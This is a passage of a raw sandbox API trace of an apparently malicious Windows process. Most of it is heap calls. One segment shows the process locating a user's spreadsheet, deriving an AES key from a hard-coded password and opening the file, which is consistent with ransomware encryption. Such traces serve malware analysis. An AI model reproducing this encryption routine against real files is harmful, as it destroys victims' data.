hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.738] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.738] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.738] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0078.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431da28 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0078.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca6b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.741] CloseHandle (hObject=0x258) returned 1 [0078.741] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.741] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.741] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff20cd0, ftCreationTime.dwHighDateTime=0x1d5ecb2, ftLastAccessTime.dwLowDateTime=0x47d95710, ftLastAccessTime.dwHighDateTime=0x1d5ede4, ftLastWriteTime.dwLowDateTime=0x47d95710, ftLastWriteTime.dwHighDateTime=0x1d5ede4, nFileSizeHigh=0x0, nFileSizeLow=0x2262, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="6O-EvMa xQmykruQi.xlsx", cAlternateFileName="6O-EVM~1.XLS")) returned 0x41ac500 [0078.741] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0078.741] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.742] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4fa8) returned 1 [0078.743] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.743] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.743] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.746] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabe0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.746] CryptCreateHash (in: hProv=0x41a4fa8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.746] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.746] CryptHashData (hHash=0x41ac040, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.747] CryptDeriveKey (in: hProv=0x41a4fa8, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac640) returned 1 [0078.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.747] CryptDestroyHash (hHash=0x41ac040) returned 1 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0078.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0078.748] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0078.748] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0078.748] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\6o-evma xqmykruqi.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.749] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.749] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: 